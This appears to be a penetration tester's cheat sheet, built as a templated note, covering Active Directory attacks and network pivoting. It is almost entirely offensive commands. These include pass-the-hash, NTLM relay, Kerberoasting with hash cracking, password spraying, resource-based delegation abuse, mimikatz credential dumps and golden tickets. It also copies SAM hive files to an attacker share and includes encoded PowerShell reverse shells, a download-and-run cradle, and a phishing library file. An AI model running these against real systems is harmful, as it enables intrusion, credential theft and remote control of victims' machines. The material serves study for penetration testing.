hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
# Pass The Hash, you might want to play around with the hash, like use the HASH:HASH version, or just HASH, or even ::HASH
impacket-wmiexec -hashes :<% tp.frontmatter["HASH"] %> <% tp.frontmatter["USERNAME"] %>@<% tp.frontmatter["RHOST"] %>
impacket-psexec -hashes :<% tp.frontmatter["HASH"] %> <% tp.frontmatter["USERNAME"] %>@<% tp.frontmatter["RHOST"] %>
# NTLM Relays
impacket-ntlmrelayx --no-http-server -smb2support -t <% tp.frontmatter["RHOST"] %> -c "whoami"
impacket-ntlmrelayx --no-http-server -smb2support -t <% tp.frontmatter["RHOST"] %> -c "powershell -ep bypass -nop -w hidden -e JABjAGwAaQ..."
# mssql impacket
impacket-mssqlclient <% tp.frontmatter["USERNAME"] %>:<% tp.frontmatter["PASSWORD"] %>@<% tp.frontmatter["RHOST"] %> -windows-auth
.\Rubeus.exe asreproast /nowrap
hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
crackmapexec smb <% tp.frontmatter["RHOST"] %> -u support -p Ironside47pleasure40Watchful --groups 'Remote Management Users'
#crackmapexec
crackmapexec smb <% tp.frontmatter["RHOST"] %> -u 'guest' -p '' --shares
crackmapexec smb <% tp.frontmatter["RHOST"] %> -u 'anonymous' -p '' --shares
#smb password spraying
crackmapexec smb <% tp.frontmatter["RHOST"] %> -u users.txt -p 'Nexus123!' -d corp.com --continue-on-success
crackmapexec smb <% tp.frontmatter["RHOST"] %> -u <% tp.frontmatter["USERNAME"] %> -p '<% tp.frontmatter["PASSWORD"] %>' -d <% tp.frontmatter["DOMAIN"] %>
crackmapexec smb <% tp.frontmatter["RHOST"] %> -u usernames.txt -p passwords.txt --continue-on-success
crackmapexec smb <% tp.frontmatter["RHOST"] %>/24 -u <% tp.frontmatter["USERNAME"] %> -H <% tp.frontmatter["HASH"] %>:<% tp.frontmatter["HASH"] %> --local-auth
# shares enumeration
crackmapexec smb <% tp.frontmatter["RHOST"] %> -u <% tp.frontmatter["USERNAME"] %> -p '<% tp.frontmatter["PASSWORD"] %>' --shares
# create a new user
impacket-addcomputer -computer-name 'keks_pc$' -computer-pass 'kekeke!!02' -dc-ip <% tp.frontmatter["RHOST"] %> '<% tp.frontmatter["DOMAIN"] %>'/'<% tp.frontmatter["USERNAME"] %>':'<% tp.frontmatter["PASSWORD"] %>'
# add new SPN to the Domain Controller attribute msDS-AllowedToActOnBehalfOfOtherIdentity
# https://raw.githubusercontent.com/tothi/rbcd-attack/master/rbcd.py
python3 rbcd.py -f KEKS_PC -t DC -dc-ip <% tp.frontmatter["RHOST"] %> '<% tp.frontmatter["DOMAIN"] %>'/'<% tp.frontmatter["USERNAME"] %>':'<% tp.frontmatter["PASSWORD"] %>'
# get ticket using S4U2Self S4U2Proxy
impacket-getST -spn host/dc.<% tp.frontmatter["DOMAIN"] %> -impersonate Administrator -dc-ip <% tp.frontmatter["RHOST"] %> '<% tp.frontmatter["DOMAIN"] %>'/'keks_pc$':'kekeke!!02'
# pass-the-ticket to the final host
export KRB5CCNAME=Administrator.ccache
impacket-wmiexec -k -no-pass support.htb/Administrator@dc.support.htb
ldapsearch -H ldap://<% tp.frontmatter["RHOST"] %> -x -b "dc=hutch,dc=offsec" | grep "sAMAccountName"
# GSSAPI
ldapsearch -x -LLL -b "" -s base supportedSASLMechanisms -H ldap:/windcorp.htb | grep GSSAPI
# if supported then
ldapwhoami -Y GSSAPI -H ldap://windcorp.htb
ldapsearch -LLLY GSSAPI -b 'DC=windcorp,DC=htb' -H ldap://windcorp.htb > scan.txt
https://medium.com/r3d-buck3t/pwning-printers-with-ldap-pass-back-attack-a0d8fa495210 https://blog.openthreatresearch.com/simulating_cve_2021_44228 https://github.com/twelvesec/RogueLDAP
# basic enum
net user /domain
net user /domain <% tp.frontmatter["USERNAME"] %>
net group /domain
net group /domain "Management Department"
# Powershell enum script 1
STARTSCRIPT
# get the hostname of the PDC
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
# Store the domain object in the $domainObj variable
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
# Store the PdcRoleOwner name to the $PDC variable
$PDC = $domainObj.PdcRoleOwner.Name
# Store the Distinguished Name variable into the $DN variable
$DN = ([adsi]'').distinguishedName
$LDAP = "LDAP://$PDC/$DN"
$direntry = New-Object System.DirectoryServices.DirectoryEntry($LDAP)
$dirsearcher = New-Object System.DirectoryServices.DirectorySearcher($direntry)
$dirsearcher.filter="samAccountType=805306368"
# $dirsearcher.filter="name=<% tp.frontmatter["USERNAME"] %>"
$result = $dirsearcher.FindAll()
Foreach($obj in $result)
{
Foreach($prop in $obj.Properties)
{
$prop.memberof
$prop
}
Write-Host "-------------------------------"
}
# Powershell enum script 2
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
New-Object System.DirectoryServices.DirectoryEntry($SearchString, "<% tp.frontmatter["USERNAME"] %>", "<% tp.frontmatter["PASSWORD"] %>")
# Powershell enum script 3
function LDAPSearch {
param (
[string]$LDAPQuery
)
$PDC = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().PdcRoleOwner.Name
$DistinguishedName = ([adsi]'').distinguishedName
$DirectoryEntry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$PDC/$DistinguishedName")
$DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher($DirectoryEntry, $LDAPQuery)
return $DirectorySearcher.FindAll()
}
# USAGE:
powershell -ep bypass
Import-Module .\function.ps1
LDAPSearch -LDAPQuery "(samAccountType=805306368)"
LDAPSearch -LDAPQuery "(objectclass=group)"
foreach ($group in $(LDAPSearch -LDAPQuery "(objectCategory=group)")) {
$group.properties | select {$_.cn}, {$_.member}
}
$sales = LDAPSearch -LDAPQuery "(&(objectCategory=group)(cn=Service Personnel*))"
$sales.properties.member
$group = LDAPSearch -LDAPQuery "(&(objectCategory=group)(cn=Development Department*))"
$group.properties.member
$group = LDAPSearch -LDAPQuery "(&(objectCategory=group)(cn=Management Department*))"
# useful resolve comands
Convert-SidToName S-1-5-21-1987370270-658905905-1781884369-1104
Resolve-IPAddress -ComputerName web04
nslookup.exe web04.corp.com
Get-Acl -Path HKLM:SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity\ | fl
# PSTools
.\PsLoggedon.exe \\files04
setspn -L iis_service
# Group Policy
Find-DomainShare (-CheckShareAccess)
# By default, the **SYSVOL** folder is mapped to **%SystemRoot%\SYSVOL\Sysvol\domain-name** on the domain controller and every domain user has access to it.
ls \\dc1.corp.com\sysvol\corp.com\Policies
cat \\dc1.corp.com\sysvol\corp.com\Policies\oldpolicy\old-policy-backup.xml
kali: gpp-decrypt "+bsY0V3d4/KgX3VJdO/vyepPfAN1zMFTiQDApgR92JE"
ls \\FILES04\docshare
ls \\FILES04\docshare\docs\do-not-share
cat \\FILES04\docshare\docs\do-not-share\start-email.txt
# wmic , psexec, winrs examples
wmic /node:<% tp.frontmatter["RHOST"] %> /user:<% tp.frontmatter["USERNAME"] %> /password:<% tp.frontmatter["PASSWORD"] %> process call create "cmd.exe"
.\PsExec64.exe -i \\WEB04 -u corp\<% tp.frontmatter["USERNAME"] %> -p <% tp.frontmatter["PASSWORD"] %> cmd
winrs -r:files04 -u:<% tp.frontmatter["USERNAME"] %> -p:<% tp.frontmatter["PASSWORD"] %> "cmd /c hostname & whoami"
# Invoke-CimMethod
$username = '<% tp.frontmatter["USERNAME"] %>';
$password = '<% tp.frontmatter["PASSWORD"] %>';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
$options = New-CimSessionOption -Protocol DCOM
$session = New-Cimsession -ComputerName <% tp.frontmatter["RHOST"] %> ƒcrack-Credential $credential -SessionOption $Options
$command = 'calc';
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};
# WINRM
$username = '<% tp.frontmatter["USERNAME"] %>';
$password = '<% tp.frontmatter["PASSWORD"] %>';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
New-PSSession -ComputerName <% tp.frontmatter["RHOST"] %> -Credential $credential
Enter-PSSession 1
# DCOM
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","<% tp.frontmatter["RHOST"] %>"))
$dcom.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c calc","7")
# in the next command, replace the powershell encoded payload with your own
$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADEANwA2ACIALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=","7")
#SHARPHOUND
Import-Module .\Sharphound.ps1
Get-Help Invoke-BloodHound
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Users\anirudh\ -OutputPrefix "corp audit"
# BLOODHOUND KALI
sudo neo4j start
bloodhound
# Queries
# ALL PCs
MATCH (m:Computer) RETURN m
# ALL Users
MATCH (m:User) RETURN m
# All active user sessions
MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p
uses ports 59 85 5986
evil-winrm -u <% tp.frontmatter["USERNAME"] %> -p '<% tp.frontmatter["PASSWORD"] %>' -i <% tp.frontmatter["RHOST"] %> -s /opt/scripts
evil-winrm -u <% tp.frontmatter["USERNAME"] %> -H <% tp.frontmatter["HASH"] %> -i <% tp.frontmatter["RHOST"] %> -s /opt/scripts
evil-winrm -u <% tp.frontmatter["USERNAME"] %> -p '<% tp.frontmatter["PASSWORD"] %>' -i <% tp.frontmatter["RHOST"] %> -s /usr/share/powershell-empire/empire/server/data/module_source/situational_awareness/network
# in shell
upload filename
download filename
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
.\mimikatz.exe "privilege::debug" "lsadump::dcsync" "exit"
.\mimikatz.exe "privilege::debug" "sekurlsa::tickets" "exit"
# kerberos silver tickets, 3 ITEMS
privilege::debug
sekurlsa::logonpasswords
# 1 ITEM: get the hash of a service account iis_service
whoami /user
# 2 ITEM: remove the RID (everything after last -) from SID
# 3 ITEM: target SPN for example web04.corp.com
# pick a user
kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:<% tp.frontmatter["DOMAIN"] %> /ptt /target:web04.corp.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:<% tp.frontmatter["USERNAME"] %>
exit
klist
# exploiting dcsync
lsadump::dcsync /user:corp\dave
lsadump::dcsync /user:corp\Administrator
hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
impacket-secretsdump -just-dc-user dave corp.com/jeffadmin:"BrouhahaTungPerorateBroom2023\!"@<% tp.frontmatter["RHOST"] %>
impacket-secretsdump spookysec.local/backup:backup2517860@<% tp.frontmatter["RHOST"] %>
impacket-secretsdump -just-dc-ntlm <% tp.frontmatter["DOMAIN"] %>/<% tp.frontmatter["USERNAME"] %>:<% tp.frontmatter["PASSWORD"] %>@<% tp.frontmatter["RHOST"] %>
# Overpass the hash
privilege::debug
sekurlsa::logonpasswords
# get hash of a user
sekurlsa::pth /user:<% tp.frontmatter["USERNAME"] %> /domain:<% tp.frontmatter["DOMAIN"] %> /ntlm:<% tp.frontmatter["HASH"] %> /run:powershell
# generating TGT
net use \\web04
.\PsExec.exe \\web04 cmd
# Pass the Ticket
privilege::debug
sekurlsa::tickets /export
# check the .kirbi files in dir
dir *.kirbi
# pick any TGS
kerberos::ptt [0;146099]-0-0-40810000-dave@cifs-web04.kirbi
klist
net view \\web04
ls \\web04\backup
# Golden Ticket
# on domain controller
privilege::debug
lsadump::lsa /patch
User : krbtgt
LM :
NTLM : 1693c6cefafffc7af11ef34d1c788f47
# on victim
kerberos::purge
kerberos::golden /user:<% tp.frontmatter["USERNAME"] %> /domain:<% tp.frontmatter["DOMAIN"] %> /sid:S-1-5-21-1987370270-658905905-1781884369 /krbtgt:1693c6cefafffc7af11ef34d1c788f47 /ptt
misc::cmd
See also: https://gist.github.com/jivoi/1c8fc3988af2e5b6df0d6cb188514962
./kerbrute_linux_amd64 userenum -d spookysec.local --dc <% tp.frontmatter["RHOST"] %> -t 10 -o /root/validusers.txt /root/userlist.txt
awk -F'\t' '{print $NF}' /root/validusers.txt | sed 's/^[[:space:]]*//' > /root/validusersf.txt
./kerbrute_linux_amd64 passwordspray --dc <% tp.frontmatter["RHOST"] %> -t 10 -d <% tp.frontmatter["DOMAIN"] %> /root/users.txt "<% tp.frontmatter["PASSWORD"] %>" -v
# or on victim
.\kerbrute_windows_amd64.exe passwordspray -d <% tp.frontmatter["DOMAIN"] %> .\usernames.txt "<% tp.frontmatter["PASSWORD"] %>"
Local user hashes are stored in the Windows Registry whilst the computer is running -- specically in the HKEY_LOCAL_MACHINE\SAM hive. This can also be found as a file at C:\Windows\System32\Config\SAM, however, this should not be readable whilst the computer is running. To dump the hashes locally, we first need to save the SAM hive:
impacket-smbserver -smb2support exfiltration /home/harris/
# Get the SAM and SYSTEM files (SeBackupPrivelege)
reg.exe save hklm\sam SAM
reg.exe save hklm\security SECURITY
reg.exe save hklm\system SYSTEM
copy SAM \\<% tp.frontmatter["LHOST"] %>\EXFILTRATION\SAM
copy SECURITY \\<% tp.frontmatter["LHOST"] %>\EXFILTRATION\SECURITY
copy SYSTEM \\<% tp.frontmatter["LHOST"] %>\EXFILTRATION\SYSTEM
# decode
pypykatz registry --sam sam system
Use: https://github.com/wavestone-cdt/powerpxe
Recovering Credentials from a PXE Boot Image
Import-Module .\PowerPXE.ps1
$BCDFile = "conf.bcd"
Get-WimFile -bcdFile $BCDFile
# this way you get a wim file location, then you can use:
Get-FindCredentials -WimFile pxeboot.wim
Use: https://github.com/tothi/rbcd-attack
When a user has a generic all priveleges over the domain controller, then we can perform this attack, allowing to impersonate any user
# first - create a new machine
impacket-addcomputer <% tp.frontmatter["DOMAIN"] %>/<% tp.frontmatter["USERNAME"] %> -dc-ip <% tp.frontmatter["RHOST"] %> -hashes :<% tp.frontmatter["HASH"] %> -computer-name 'ATTACK$' -computer-pass 'AttackerPC1!'
# Now with this newly created machine, I need a way of managing the delegation rights. I can use this rbcd.py script to configure its attribute “msDS-AllowedToActOnBehalfOfOtherIdentity”.
python3 rbcd.py -dc-ip <% tp.frontmatter["RHOST"] %> -t RESOURCEDC -f 'ATTACK' -hashes :<% tp.frontmatter["HASH"] %> <% tp.frontmatter["DOMAIN"] %>\\<% tp.frontmatter["USERNAME"] %>
# Now all that is left to do is obtain the ticket created of the impersonated Administrator locally and authenticate to the domain controller using this ticket.
impacket-getST -spn cifs/DC.<% tp.frontmatter["DOMAIN"] %> <% tp.frontmatter["DOMAIN"] %>/attack\$:'AttackerPC1!' -impersonate Administrator -dc-ip <% tp.frontmatter["RHOST"] %>
# This will save the ticket locally so export it as such:
export KRB5CCNAME=./Administrator.ccache
# Finally, I can use psexec to connect to the domain controller as the Administrator using local credential file thus spawning a high privileged level shell.
impacket-psexec -k -no-pass DC.<% tp.frontmatter["DOMAIN"] %> -dc-ip <% tp.frontmatter["RHOST"] %>
wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /root/webdav/
# ON PREPARATION MACHINE
# WEBDAV FILE config.Library-ms
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://<% tp.frontmatter["LHOST"] %></url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
# CREATE MALICIOUS LINK WITH FOLLOWING PATH
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<% tp.frontmatter["LHOST"] %>/shells/powercat.ps1'); powercat -c 1<% tp.frontmatter["LHOST"] %> -p <% tp.frontmatter["LPORT"] %> -e powershell"
Payload1 to download and execute Powercat, need to host powercat:
PS> $Text = 'IIEX(New-Object System.Net.WebClient).DownloadString('http://<% tp.frontmatter["LHOST"] %>/shells/powercat.ps1'); powercat -c 1<% tp.frontmatter["LHOST"] %> -p <% tp.frontmatter["LPORT"] %> -e powershell'
Payload2:
PS> $Text = '$client = New-Object System.Net.Sockets.TCPClient("<% tp.frontmatter["LHOST"] %>",<% tp.frontmatter["LPORT"] %>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
PS> $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
PS> $EncodedText =[Convert]::ToBase64String($Bytes)
PS> $EncodedText
import sys
import base64
payload = '$client = New-Object System.Net.Sockets.TCPClient("<% tp.frontmatter["LHOST"] %>",<% tp.frontmatter["LPORT"] %>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
# payload = 'iwr -uri http://<% tp.frontmatter["LHOST"] %>/met.exe -Outfile met.exe;.\\met.exe'
cmd = "powershell -nop -w hidden -ep bypass -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()
print(cmd)
To avoid confusion, some commands in this part will not be replaced.
There are five possible ways to enumerate a network through a compromised host:
Using material found on the machine. The hosts file or ARP cache, for example
Using pre-installed tools
Using statically compiled tools
Using scripting techniques
Using local tools through a proxy
Linux:
arp -a
/etc/hosts
/etc/resolv.conf
nmcli dev show
Win:
arp -a
C:\Windows\System32\drivers\etc\hosts
ipconfig /all
It's worth noting as well that you may encounter hosts which have firewalls blocking ICMP pings (Windows boxes frequently do this, for example). This is likely to be less of a problem when pivoting, however, as these firewalls (by default) often only apply to external traffic, meaning that anything sent through a compromised host on the network should be safe. It's worth keeping in mind, however.
[ProxyList]
socks4 IP_ADDR 1080
Configs;
The current directory (i.e. ./proxychains.conf)
~/.proxychains/proxychains.conf
/etc/proxychains.conf
If performing an Nmap scan through proxychains, this option can cause the scan to hang and ultimately crash. Comment out the proxy_dns line using a hashtag (#) at the start of the line before performing a scan through the proxy!
You can only use TCP scans -- so no UDP or SYN scans. ICMP Echo packets (Ping requests) will also not work through the proxy, so use the -Pn switch to prevent Nmap from trying it.
Forward Connections:
Port forwarding is accomplished with the -L switch, which creates a link to a Local port. For example, if we had SSH access to 172.16.0.5 and there's a webserver running on 172.16.0.10, we could use this command to create a link to the server on 172.16.0.10:
ssh -L 8000:172.16.0.10:80 user@172.16.0.5 -fN
Proxies are made using the -D switch, for example: -D 1337. This will open up port 1337 on your attacking box as a proxy to send data through into the protected network. This is useful when combined with a tool such as proxychains. An example of this command would be:
ssh -D 1337 user@172.16.0.5 -fN
Reverse Connections:
Before we can make a reverse connection safely, there are a few steps we need to take:
First, on victim generate a new set of SSH keys and store them somewhere safe (ssh-keygen)
Copy the contents of the public key (the file ending with .pub), then edit the ~/.ssh/authorized_keys file on your own attacking machine. You may need to create the ~/.ssh directory and authorized_keys file first.
On a new line, type the following line, then paste in the public key:
command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-x11-forwarding,no-pty
This makes sure that the key can only be used for port forwarding, disallowing the ability to gain a shell on your attacking machine.
The only thing left is to do the unthinkable: transfer the private key to the target box. This is usually an absolute no-no, which is why we generated a throwaway set of SSH keys to be discarded as soon as the engagement is over.
With the key transferred, we can then connect back with a reverse port forward using the following command:
ssh -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -fN
To put that into the context of our fictitious IPs: 172.16.0.10 and 172.16.0.5, if we have a shell on 172.16.0.5 and want to give our attacking box (172.16.0.20) access to the webserver on 172.16.0.10, we could use this command on the 172.16.0.5 machine:
ssh -R 8000:172.16.0.10:80 kali@172.16.0.20 -i KEYFILE -fN
In newer versions of the SSH client, it is also possible to create a reverse proxy (the equivalent of the -D switch used in local connections). This may not work in older clients, but this command can be used to create a reverse proxy in clients which do support it:
ssh -R 1337 USERNAME@ATTACKING_IP -i KEYFILE -fN
# ssh remote portforward
A: sudo systemctl start ssh
V: ssh -N -R 127.0.0.1:4141:192.168.246.7:2222 keks@192.168.45.246
# ssh remote dynamic portforward
ssh -N -R 9998 keks@192.168.119.169
add localhost:9998 to proxychains
proxychains nmap -vvv -sT -p9000-9100 -Pn -n 192.168.169.64
# ssh local portforward
ssh -N -L 0.0.0.0:9876:0.0.0.0:4646 kali@127.0.0.1
ssh -N -L 0.0.0.0:4455:172.16.169.217:4242 database_admin@10.4.169.215
smbclient -p 4455 -L //<% tp.frontmatter["RHOST"] %>/ -U hr_admin --password=Welcome1234
# dynamic portforward
ssh -N -D 0.0.0.0:9998 database_admin@10.4.169.215
add host:9998 to attackers proxychains
cmd.exe /c echo y | .\plink.exe -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -N
To use our example from before, if we have access to 172.16.0.5 and would like to forward a connection to 172.16.0.10:80 back to port 8000 our own attacking machine (172.16.0.20), we could use this command:
cmd.exe /c echo y | .\plink.exe -R 8000:172.16.0.10:80 kali@172.16.0.20 -i KEYFILE -N
Note that any keys generated by ssh-keygen will not work properly here.
puttygen KEYFILE -o OUTPUT_KEY.ppk
proxychains smbclient -L //172.16.169.217/ -U hr_admin --password=Welcome1234
proxychains nmap -vvv -sT --top-ports=20 -Pn 172.16.169.217
PLINK: C:\Windows\Temp\plink.exe -ssh -l keks -pw "Qwlan0808<" -R 127.0.0.1:9833:127.0.0.1:3389 192.168.45.229
On Kali (inside the directory containing your Socat binary):
sudo python3 -m http.server 80
Then, on the target:
curl ATTACKING_IP/socat -o /tmp/socat-USERNAME && chmod +x /tmp/socat-USERNAME
Reverse Shell Relay
In this scenario we are using socat to create a relay for us to send a reverse shell back to our own attacking machine (as in the diagram above). First let's start a standard netcat listener on our attacking box (sudo nc -lvnp 443). Next, on the compromised server, use the following command to start the relay:
./socat tcp-l:8000 tcp:ATTACKING_IP:443 &
Port Forwarding -- Easy
The quick and easy way to set up a port forward with socat is quite simply to open up a listening port on the compromised server, and redirect whatever comes into it to the target server. For example, if the compromised server is 172.16.0.5 and the target is port 3306 of 172.16.0.10, we could use the following command (on the compromised server) to create a port forward:
./socat tcp-l:33060,fork,reuseaddr tcp:172.16.0.10:3306 &
Port Forwarding -- Quiet
The previous technique is quick and easy, but it also opens up a port on the compromised server, which could potentially be spotted by any kind of host or network scanning. Whilst the risk is not massive, it pays to know a slightly quieter method of port forwarding with socat. This method is marginally more complex, but doesn't require opening up a port externally on the compromised server.
First of all, on our own attacking machine, we issue the following command:
socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &
This opens up two ports: 8000 and 8001, creating a local port relay. What goes into one of them will come out of the other. For this reason, port 8000 also has the fork and reuseaddr options set, to allow us to create more than one connection using this port forward.
Next, on the compromised relay server (172.16.0.5 in the previous example) we execute this command:
./socat tcp:ATTACKING_IP:8001 tcp:TARGET_IP:TARGET_PORT,fork &
This makes a connection between our listening port 8001 on the attacking machine, and the open port of the target server. To use the fictional network from before, we could enter this command as:
./socat tcp:10.50.73.2:8001 tcp:172.16.0.10:80,fork &
This would create a link between port 8000 on our attacking machine, and port 80 on the intended target (172.16.0.10), meaning that we could go to localhost:8000 in our attacking machine's web browser to load the webpage served by the target: 172.16.0.10:80!
socat -ddd TCP-LISTEN:4141,fork TCP:192.168.223.64:2222
socat TCP-LISTEN:22222,fork TCP:10.4.169.215:22
The chisel binary has two modes: client and server. You can access the help menus for either with the command: chisel client|server --help
Reverse SOCKS Proxy:
On our own attacking box we would use a command that looks something like this:
./chisel server -p LISTEN_PORT --reverse &
This sets up a listener on your chosen LISTEN_PORT.
On the compromised host, we would use the following command:
./chisel client ATTACKING_IP:LISTEN_PORT R:socks &
Forward SOCKS Proxy:
Forward proxies are rarer than reverse proxies for the same reason as reverse shells are more common than bind shells; generally speaking, egress firewalls (handling outbound traffic) are less stringent than ingress firewalls (which handle inbound connections). That said, it's still well worth learning how to set up a forward proxy with chisel.
In many ways the syntax for this is simply reversed from a reverse proxy.
First, on the compromised host we would use:
./chisel server -p LISTEN_PORT --socks5
On our own attacking box we would then use:
./chisel client TARGET_IP:LISTEN_PORT PROXY_PORT:socks
Remote Port Forward:
A remote port forward is when we connect back from a compromised target to create the forward.
For a remote port forward, on our attacking machine we use the exact same command as before:
./chisel server -p LISTEN_PORT --reverse &
Once again this sets up a chisel listener for the compromised host to connect back to.
The command to connect back is slightly different this time, however:
./chisel client ATTACKING_IP:LISTEN_PORT R:LOCAL_PORT:TARGET_IP:TARGET_PORT &
You may recognise this as being very similar to the SSH reverse port forward method, where we specify the local port to open, the target IP, and the target port, separated by colons. Note the distinction between the LISTEN_PORT and the LOCAL_PORT. Here the LISTEN_PORT is the port that we started the chisel server on, and the LOCAL_PORT is the port we wish to open on our own attacking machine to link with the desired target port.
To use an old example, let's assume that our own IP is 172.16.0.20, the compromised server's IP is 172.16.0.5, and our target is port 22 on 172.16.0.10. The syntax for forwarding 172.16.0.10:22 back to port 2222 on our attacking machine would be as follows:
./chisel client 172.16.0.20:1337 R:2222:172.16.0.10:22 &
Connecting back to our attacking machine, functioning as a chisel server started with:
./chisel server -p 1337 --reverse &
Remote Port Forward:
A remote port forward is when we connect back from a compromised target to create the forward.
For a remote port forward, on our attacking machine we use the exact same command as before:
./chisel server -p LISTEN_PORT --reverse &
Once again this sets up a chisel listener for the compromised host to connect back to.
The command to connect back is slightly different this time, however:
./chisel client ATTACKING_IP:LISTEN_PORT R:LOCAL_PORT:TARGET_IP:TARGET_PORT &
